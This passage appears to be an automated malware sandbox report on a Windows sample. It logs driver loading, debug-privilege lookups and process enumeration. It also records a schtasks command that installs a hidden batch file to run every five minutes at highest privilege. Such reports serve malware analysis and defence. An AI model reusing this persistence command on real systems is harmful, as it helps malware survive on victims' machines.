| Open | c:\program files\windows multimedia platform\separate.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\bulgaria.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\advertisement-beginners.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\semiconductorphysfisheries.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\medicare.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\spain-chart.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\females-ward.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft.net\beast.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\msfeedssync.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\nwserbna.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\schtasks.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (72)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc55800000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ffc57b50000 |
|
17 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffc558202a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffc558223f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffc558163c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffc5581d920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffc55825620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffc55825580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffc558255e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffc55820e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffc5581f110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffc57b8cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffc57b95790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffc57b8ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffc558228c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffc57b8c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffc57b95410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffc57be42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffc57bc95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffc57be3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffc55820fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffc55842720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffc550fe7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffc558428e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffc55816010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffc55842a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffc55820310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffc55842bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffc558225d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffc55842cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffc55816000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffc550945e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffc558165a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffc5581e960 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtLoadDriver, address_out = 0x7ffc57be4490 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ffc57b6f0d0 |
|
2 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ffc57be36d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ffc57be3790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ffc57be38a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ffc57be4980 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ffc57be47f0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ffc57be46c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ffc57be3ac0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ffc57be3640 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ffc57be3a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ffc57bb5d30 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ffc57b736a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ffc57b77110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ffc57b77110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ffc57b73dc0 |
|
1 |
Driver (284)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | \??\C:\Windows\system32\Drivers\PROCEXP152.SYS | - |
|
1 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
203 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
8 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
1 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
62 |
User (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Lookup Privilege | privilege = SeLoadDriverPrivilege, luid = 10 |
|
1 |
System (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #38: schtasks.exe
13
0
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\syswow64\schtasks.exe |
| Command Line | schtasks /Create /tn DSHCA /tr "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvaXf73S.bat" /sc minute /mo 5 /RL HIGHEST /F |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:59, Reason: Child Process |
| Unmonitor | End Time: 00:02:13, Reason: Self Terminated |
| Monitor Duration | 00:00:14 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xba4 |
| Parent PID | 0xf74 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4F8
0x
56C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000790000 | 0x00790000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x0079ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007b1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x007b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00863fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x00881fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00890000 | 0x0094dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x0098ffff | Private Memory | rw |
|
|
|
- |
| schtasks.exe.mui | 0x00990000 | 0x009a2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x009b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x009cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b80000 | 0x00b80000 | 0x00c7ffff | Private Memory | rw |
|
|
|
- |
| schtasks.exe | 0x00df0000 | 0x00e21fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x04e2ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04e30000 | 0x05166fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x737c0000 | 0x737ecfff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x737f0000 | 0x7387bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76fe0000 | 0x77061fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x770d0000 | 0x77161fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f110000 | 0x7f110000 | 0x7f20ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f210000 | 0x7f210000 | 0x7f232fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f233000 | 0x7f233000 | 0x7f233fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f239000 | 0x7f239000 | 0x7f239fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f23a000 | 0x7f23a000 | 0x7f23cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f23d000 | 0x7f23d000 | 0x7f23ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (8)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2019-01-24T01:11:00 |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\schtasks.exe | base_address = 0xdf0000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\schtasks.exe, file_name_orig = C:\Windows\SysWOW64\schtasks.exe, size = 260 |
|
2 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Local Time, time = 2019-01-24 01:11:32 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2019-01-24 01:11:33 (Local Time) |
|
1 |
Process #39: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #39 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:01, Reason: Created Scheduled Job |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x324 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
5D8
0x
510
0x
E98
0x
E0C
0x
E04
0x
DF8
0x
DFC
0x
DEC
0x
DCC
0x
DC8
0x
6D8
0x
24C
0x
8B4
0x
8B0
0x
894
0x
864
0x
43C
0x
7A8
0x
778
0x
758
0x
750
0x
73C
0x
734
0x
730
0x
72C
0x
700
0x
6FC
0x
64C
0x
634
0x
624
0x
604
0x
600
0x
5F8
0x
5F0
0x
5EC
0x
5E8
0x
5E0
0x
5C8
0x
5B4
0x
5B0
0x
590
0x
574
0x
50C
0x
40C
0x
374
0x
140
0x
18C
0x
14C
0x
FC
0x
F8
0x
F4
0x
3FC
0x
3EC
0x
3E8
0x
3E0
0x
3D0
0x
3CC
0x
3C8
0x
3B8
0x
390
0x
328
0x
484
0x
954
0x
334
0x
9B4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000b42eea0000 | 0xb42eea0000 | 0xb42eeaffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xb42eeb0000 | 0xb42eeb0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b42eec0000 | 0xb42eec0000 | 0xb42eed3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b42eee0000 | 0xb42eee0000 | 0xb42ef5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b42ef60000 | 0xb42ef60000 | 0xb42ef63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b42ef70000 | 0xb42ef70000 | 0xb42ef70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b42ef80000 | 0xb42ef80000 | 0xb42ef81fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b42efb0000 | 0xb42efb0000 | 0xb42efb6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b42efc0000 | 0xb42efc0000 | 0xb42efc1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b42efd0000 | 0xb42efd0000 | 0xb42efd1fff | Pagefile Backed Memory | r |
|
|
|
- |
| newdev.dll.mui | 0xb42efe0000 | 0xb42efe6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b42eff0000 | 0xb42eff0000 | 0xb42eff0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b42f000000 | 0xb42f000000 | 0xb42f000fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b42f010000 | 0xb42f010000 | 0xb42f016fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xb42f020000 | 0xb42f0ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b42f0e0000 | 0xb42f0e0000 | 0xb42f0e0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b42f0f0000 | 0xb42f0f0000 | 0xb42f0f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b42f100000 | 0xb42f100000 | 0xb42f1fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b42f200000 | 0xb42f200000 | 0xb42f2bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b42f2c0000 | 0xb42f2c0000 | 0xb42f2c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b42f2d0000 | 0xb42f2d0000 | 0xb42f2d6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b42f2e0000 | 0xb42f2e0000 | 0xb42f2e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b42f2f0000 | 0xb42f2f0000 | 0xb42f2f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b42f300000 | 0xb42f300000 | 0xb42f3fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b42f400000 | 0xb42f400000 | 0xb42f587fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b42f590000 | 0xb42f590000 | 0xb42f710fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b42f720000 | 0xb42f720000 | 0xb42f79ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b42f7a0000 | 0xb42f7a0000 | 0xb42f81ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b42f820000 | 0xb42f820000 | 0xb42f820fff | Pagefile Backed Memory | rw |
|
|
|
- |
| iphlpsvc.dll.mui | 0xb42f830000 | 0xb42f83cfff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0xb42f840000 | 0xb42f843fff | Memory Mapped File | r |
|
|
|
- |
| gpsvc.dll.mui | 0xb42f850000 | 0xb42f85cfff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0xb42f860000 | 0xb42f863fff | Memory Mapped File | r |
|
|
|
- |
| propsys.dll.mui | 0xb42f870000 | 0xb42f880fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b42f890000 | 0xb42f890000 | 0xb42f896fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b42f8a0000 | 0xb42f8a0000 | 0xb42f8a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b42f8b0000 | 0xb42f8b0000 | 0xb42f8b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b42f8c0000 | 0xb42f8c0000 | 0xb42f8c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b42f8d0000 | 0xb42f8d0000 | 0xb42f8d6fff | Private Memory | rw |
|
|
|
- |
| activeds.dll.mui | 0xb42f8e0000 | 0xb42f8e1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b42f8f0000 | 0xb42f8f0000 | 0xb42f8f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b42f900000 | 0xb42f900000 | 0xb42f9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b42fa00000 | 0xb42fa00000 | 0xb42fafffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b42fb00000 | 0xb42fb00000 | 0xb42fbfffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xb42fc00000 | 0xb42ff36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b42ff40000 | 0xb42ff40000 | 0xb43003ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430040000 | 0xb430040000 | 0xb43013ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430140000 | 0xb430140000 | 0xb43023ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430240000 | 0xb430240000 | 0xb43033ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430340000 | 0xb430340000 | 0xb4303bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b4303c0000 | 0xb4303c0000 | 0xb4303c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| vsstrace.dll.mui | 0xb4303d0000 | 0xb4303d8fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll | 0xb4303e0000 | 0xb4303e4fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0xb4303f0000 | 0xb4303fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b430400000 | 0xb430400000 | 0xb4304fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430500000 | 0xb430500000 | 0xb4305fffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0xb430600000 | 0xb43068afff | Memory Mapped File | r |
|
|
|
- |
| mswsock.dll.mui | 0xb430690000 | 0xb430692fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b4306a0000 | 0xb4306a0000 | 0xb4306e0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b4306f0000 | 0xb4306f0000 | 0xb4306f7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430700000 | 0xb430700000 | 0xb4307fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430800000 | 0xb430800000 | 0xb4308fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430900000 | 0xb430900000 | 0xb43097ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db | 0xb430980000 | 0xb4309c2fff | Memory Mapped File | r |
|
|
|
- |
